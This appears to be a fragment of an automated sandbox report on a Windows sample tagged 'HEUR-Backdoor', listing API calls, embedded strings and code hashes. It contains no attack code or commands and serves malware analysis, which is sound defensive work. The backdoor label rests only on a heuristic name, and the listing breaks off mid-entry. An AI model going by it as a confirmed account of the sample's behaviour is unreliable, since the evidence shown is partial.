                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                • API String ID: 3813983858-639343689
                                                • Opcode ID: 8db7f4274e854334db7d3f829a387124e05b46665d47227123c06c5b9baacd6e
                                                • Instruction ID: ab98934e0be7aef48fdd48c54c30ea1d9ab0a2cf6192a910db743e13e2284ad7
                                                • Opcode Fuzzy Hash: 8db7f4274e854334db7d3f829a387124e05b46665d47227123c06c5b9baacd6e
                                                • Instruction Fuzzy Hash: 5F31C471908248EEDF14EBA4DC49BEE7B7CBF54314F004056F445E7292EBB88A44CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007D130B: GetDlgItem.USER32(00000000,00003021), ref: 007D134F
                                                  • Part of subcall function 007D130B: SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365
                                                • EndDialog.USER32(?,00000001), ref: 007EA4B8
                                                • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 007EA4CD
                                                • SetDlgItemTextW.USER32(?,00000066,?), ref: 007EA4E2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ItemText$DialogWindow
                                                • String ID: ASKNEXTVOL
                                                • API String ID: 445417207-3402441367
                                                • Opcode ID: 23330e93086a6d5daf68723c631df90328e5e7c2ee9c0b1edc54adad5696d0c2
                                                • Instruction ID: e7d90078dd7ff607d46f4d04b9fcfd22c29ad9367f2418d93f7b494663515d81
                                                • Opcode Fuzzy Hash: 23330e93086a6d5daf68723c631df90328e5e7c2ee9c0b1edc54adad5696d0c2
                                                • Instruction Fuzzy Hash: 7F1181322462C0BFD6219FAD9D4DF6637A9FB8F700F144405F241DA1E0C7A9A906DB22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: __fprintf_l_strncpy
                                                • String ID: $%s$@%s
                                                • API String ID: 1857242416-834177443
                                                • Opcode ID: 317c00e86b1c25119066f6b867246c4c062bd2f2bcea88454c091a5aa817f7eb
                                                • Instruction ID: f7824fa6635cf0f7c2e879f0d1539af84b1f6f036b34c245599d9223bf7d553c
                                                • Opcode Fuzzy Hash: 317c00e86b1c25119066f6b867246c4c062bd2f2bcea88454c091a5aa817f7eb
                                                • Instruction Fuzzy Hash: 8B213B7254024CAADB319EA4CC4AFEA7BB8FB05300F040513FA15962A1E379EA559B61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007D130B: GetDlgItem.USER32(00000000,00003021), ref: 007D134F
                                                  • Part of subcall function 007D130B: SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365
                                                • EndDialog.USER32(?,00000001), ref: 007EA9DE
                                                • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 007EA9F6
                                                • SetDlgItemTextW.USER32(?,00000067,?), ref: 007EAA24
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ItemText$DialogWindow
                                                • String ID: GETPASSWORD1
                                                • API String ID: 445417207-3292211884
                                                • Opcode ID: e874e7e78d15ef61f40dd56df7e7317ffd993b56e95b0973648977bed5d3732f
                                                • Instruction ID: 6e00c1ec4d0bfe264d6d9fe235a9fb92a686195f5e5218a090f36cffbb4cbfd5
                                                • Opcode Fuzzy Hash: e874e7e78d15ef61f40dd56df7e7317ffd993b56e95b0973648977bed5d3732f
                                                • Instruction Fuzzy Hash: F5114832941218BADB21AE659E09FFA377CFB4D300F004421FA45F2191C268B954D672
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _swprintf.LIBCMT ref: 007DB51E
                                                  • Part of subcall function 007D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D401D
                                                • _wcschr.LIBVCRUNTIME ref: 007DB53C
                                                • _wcschr.LIBVCRUNTIME ref: 007DB54C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                • String ID: %c:\
                                                • API String ID: 525462905-3142399695
                                                • Opcode ID: 3f1d3a45c298c6370f6d679cf4928a49add426a04aff017156981f6bdb3dd1c0
                                                • Instruction ID: 574dbc86179958082eaa9fea04252799d57c0d0da80b62082d290f331b487a41
                                                • Opcode Fuzzy Hash: 3f1d3a45c298c6370f6d679cf4928a49add426a04aff017156981f6bdb3dd1c0
                                                • Instruction Fuzzy Hash: F301F953904311FAD720AB75AC8AC7BB7BCDE953A0B914417F986D7281FB38D970C2A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,007DABC5,00000008,?,00000000,?,007DCB88,?,00000000), ref: 007E06F3
                                                • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,007DABC5,00000008,?,00000000,?,007DCB88,?,00000000), ref: 007E06FD
                                                • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,007DABC5,00000008,?,00000000,?,007DCB88,?,00000000), ref: 007E070D
                                                Strings
                                                • Thread pool initialization failed., xrefs: 007E0725
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                • String ID: Thread pool initialization failed.
                                                • API String ID: 3340455307-2182114853
                                                • Opcode ID: becc8b2b7d996c6fe8a22085f62cbbc0c5956495ddae82f666f126c6bd6cf1f8
                                                • Instruction ID: 71b2d500e79fa9d1f9820aa79c337aacf0b14b7ee424c549aa990a1282c85466
                                                • Opcode Fuzzy Hash: becc8b2b7d996c6fe8a22085f62cbbc0c5956495ddae82f666f126c6bd6cf1f8
                                                • Instruction Fuzzy Hash: 361170B1601709AFD3215F66DC88AA7FBECFB99754F10482EF1DAC2200D6B56981CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RENAMEDLG$REPLACEFILEDLG
                                                • API String ID: 0-56093855
                                                • Opcode ID: 4e5b3b9b18b8169b972dfdf522c2839df80b4ee916e570725231adc8efec0ff5
                                                • Instruction ID: 8b2340c5c95419739638204cde179d801592cf2d1378ac32ce94224d5ee5ce0a
                                                • Opcode Fuzzy Hash: 4e5b3b9b18b8169b972dfdf522c2839df80b4ee916e570725231adc8efec0ff5
                                                • Instruction Fuzzy Hash: 6E01F17160228AEFCB219F1AED01A963FADFB1C380B108421F901C2270CA789C50EBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: __alldvrm$_strrchr
                                                • String ID:
                                                • API String ID: 1036877536-0
                                                • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                                • Instruction ID: 6cdec5e5323eff8a73ca0ac2e6ebad2d8339aef0d1c5da9077d3c0fbdacbe52f
                                                • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                                • Instruction Fuzzy Hash: 47A14572A0438A9FDB25CF68C8917BEBBE5FF65310F144169E7859B381C23C9942C751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,007D80B7,?,?,?), ref: 007DA351
                                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,007D80B7,?,?), ref: 007DA395
                                                • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,007D80B7,?,?,?,?,?,?,?,?), ref: 007DA416
                                                • CloseHandle.KERNEL32(?,?,00000000,?,007D80B7,?,?,?,?,?,?,?,?,?,?,?), ref: 007DA41D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: File$Create$CloseHandleTime
                                                • String ID:
                                                • API String ID: 2287278272-0
                                                • Opcode ID: bb68775dfd0cbc7d4287a689cbd9178a72178c0972847b49a27de5baaf6cb257
                                                • Instruction ID: ccbf8bc03a3a98ac0ccb880d929cb9fc10c7e78ad4e3f6f64ec4b1ee1077510c
                                                • Opcode Fuzzy Hash: bb68775dfd0cbc7d4287a689cbd9178a72178c0972847b49a27de5baaf6cb257
                                                • Instruction Fuzzy Hash: 9241AF31288385AAD731DF64DC45BAEBBF9BB95700F04091EB5D093281D7A89A48DB53
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,007F89AD,?,00000000,?,00000001,?,?,00000001,007F89AD,?), ref: 007FC0E6
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007FC16F
                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,007F67E2,?), ref: 007FC181
                                                • __freea.LIBCMT ref: 007FC18A
                                                  • Part of subcall function 007F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007FC13D,00000000,?,007F67E2,?,00000008,?,007F89AD,?,?,?), ref: 007F854A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                • String ID:
                                                • API String ID: 2652629310-0
                                                • Opcode ID: 4add49b1bfa35cd67116ef79d557fc619de8079c8d09fa5b9aa6628156d6e22b
                                                • Instruction ID: 02019cece38073e58980655fbc6e8240c129f54166bd93a733ece554380d34be
                                                • Opcode Fuzzy Hash: 4add49b1bfa35cd67116ef79d557fc619de8079c8d09fa5b9aa6628156d6e22b
                                                • Instruction Fuzzy Hash: C031E3B2A0011EABDF268F65DD45DBE7BA5EB44310F140128FD04D7291E739CD60CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 007F251A
                                                  • Part of subcall function 007F2B52: ___AdjustPointer.LIBCMT ref: 007F2B9C
                                                • _UnwindNestedFrames.LIBCMT ref: 007F2531
                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 007F2543
                                                • CallCatchBlock.LIBVCRUNTIME ref: 007F2567
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                • String ID:
                                                • API String ID: 2633735394-0
                                                • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                                • Instruction ID: dca912c072a35cdc5d770b29e4832baa3e38e736590fad821372bdd509433cc4
                                                • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                                • Instruction Fuzzy Hash: F501053200010CEBCF129F65CC15EAA3BAAEF58714F158054FA1866221D33AE962ABA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetDC.USER32(00000000), ref: 007E9DBE
                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 007E9DCD
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007E9DDB
                                                • ReleaseDC.USER32(00000000,00000000), ref: 007E9DE9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CapsDevice$Release
                                                • String ID:
                                                • API String ID: 1035833867-0
                                                • Opcode ID: 0af8867cfe21c800871db35ac46fe2202cfe2cc267bfeead4fe44aa3b536fd1e
                                                • Instruction ID: 45457dead709c8b37a35e4c8a6b429f8532d71651a4eaa8920b7a7213133afb5
                                                • Opcode Fuzzy Hash: 0af8867cfe21c800871db35ac46fe2202cfe2cc267bfeead4fe44aa3b536fd1e
                                                • Instruction Fuzzy Hash: DEE0EC3198AA31A7D3281BA5BC1DB8B3B59BF49712F054415F70596190DA744449CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 007F2016
                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 007F201B
                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 007F2020
                                                  • Part of subcall function 007F310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 007F311F
                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 007F2035
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                • String ID:
                                                • API String ID: 1761009282-0
                                                • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                                • Instruction ID: 5d6c1d9e852f6535ad044aff937ad30d245fb326ae71adbb76dc9507517a028a
                                                • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                                • Instruction Fuzzy Hash: 20C04C26009A4CE41C113AB1620B1BD07400E637C4BA220C2EB8017343DE0E0A0BB037
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007E9DF1: GetDC.USER32(00000000), ref: 007E9DF5
                                                  • Part of subcall function 007E9DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 007E9E00
                                                  • Part of subcall function 007E9DF1: ReleaseDC.USER32(00000000,00000000), ref: 007E9E0B
                                                • GetObjectW.GDI32(?,00000018,?), ref: 007E9F8D
                                                  • Part of subcall function 007EA1E5: GetDC.USER32(00000000), ref: 007EA1EE
                                                  • Part of subcall function 007EA1E5: GetObjectW.GDI32(?,00000018,?), ref: 007EA21D
                                                  • Part of subcall function 007EA1E5: ReleaseDC.USER32(00000000,?), ref: 007EA2B5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ObjectRelease$CapsDevice
                                                • String ID: (
                                                • API String ID: 1061551593-3887548279
                                                • Opcode ID: 5e9315baa85d90847f022335c31d18ea82e56d09d0b270c4753702f659ca135e
